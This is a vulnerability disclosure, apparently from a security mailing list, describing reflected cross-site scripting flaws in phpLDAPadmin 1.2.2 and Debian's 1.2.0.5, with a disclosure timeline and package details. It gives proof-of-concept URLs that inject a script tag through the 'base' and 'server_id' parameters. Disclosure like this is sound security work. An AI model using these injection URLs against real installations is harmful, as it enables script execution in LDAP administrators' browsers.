phpldapadmin 1.2.2 Cross Site Scripting

`Attach some PoC analysis related to a XSS vulnerability to phpldapadmin. I previously coordinate with the Cert-US in order they contact with Sourceforge and Debian, but receive they was unable to put in contact with them.  
  
The first discover was on January 10 for 1.1.6 version, where after noticed that the same vulnerability was discover previously. For that reason I tested later for version 1.2.2 (sourceforge) and 1.2.0.5 (Debian package).  
More reference: see the files attached  
  
On January 24 I contacted to sourceforge and appear they fix the package but still persistence on debian packages.  
  
Fix from sourceforge:  
https://sourceforge.net/tracker/index.php?func=detail&aid=3477910&group_id=61828&atid=498546  
  
  
  
  
Background:  
===========  
phpLDAPadmin is a web-based LDAP client. It provides easy, anywhere-accessible, multilanguage administration for your LDAP server. Its hierarchical tree-viewer and advanced search functionality make it intuitive to browse and administer your LDAP directory. Since it is a web application, this LDAP browser works on many platforms, making your LDAP server easily manageable from any location.  
  
  
Details:  
========  
  
1.- Version 1.2.2 from Sourceforge package:http://sourceforge.net/projects/phpldapadmin/files/phpldapadmin-php5/1.2.2/phpldapadmin-1.2.2.tgz/download  
  
Exploitables URI's: http://x.x.x.x/phpldapadmin/htdocs/cmd.php?cmd=query_engine&server_id=1&query=none&format=list&showresults=na&base=?&scope=sub&filter=objectClass%3D*&display_attrs=cn%2C+sn%2C+uid%2C+postalAddress%2C+telephoneNumber&orderby=&size_limit=50&search=Search  
  
PoC:  
http://x.x.x.x/phpldapadmin/htdocs/cmd.php?cmd=query_engine&server_id=1&query=none&format=list&showresults=na&base=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&scope=sub&filter=objectClass%3D*&display_attrs=cn%2C+sn%2C+uid%2C+postalAddress%2C+telephoneNumber&orderby=&size_limit=50&search=Search  
  
Exploitable variable: base  
  
Results: XSS passing through "base" variable.  
  
2.- Version 1.2.0.5 from debian (testing and unstable repositories)  
Package:  
Version: 1.2.0.5-2  
Depends: apache2 | httpd, php5-ldap, libapache2-mod-php5 | libapache-mod-php5 | php5-cgi | php5, ucf (>= 0.28), debconf (>= 0.5) | debconf-2.0  
Filename: pool/main/p/phpldapadmin/phpldapadmin_1.2.0.5-2_all.deb  
Size: 1276080  
MD5sum: 3b4058f7fc74ff95f8223bf92bb99ec7  
SHA1: 2594603f2346de814195bc6aba5e97a4febb17fb  
SHA256: 4e1be7218c8030f1f17c5cd4c4f4fdb69cf5315d3e4b22bb2b4cabd7cfb93d57  
  
PoC:  
  
https://x.x.x.x/phpldapadmin/cmd.php?server_id=<script>alert('XSS')</script>  
https://x.x.x.x/phpldapadmin/index.php?server_id=<script>alert('XSS')</script>&redirect=false  
  
Exploitable Variable: server_id  
  
Results: XSS passing through "server_id" variable.  
  
Impact: Remote attackers might be able to perform Cross-Site Scripting (XSS) attacks by various vectors.  
  
Thanks in advance for your comments  
Kind Regards  
`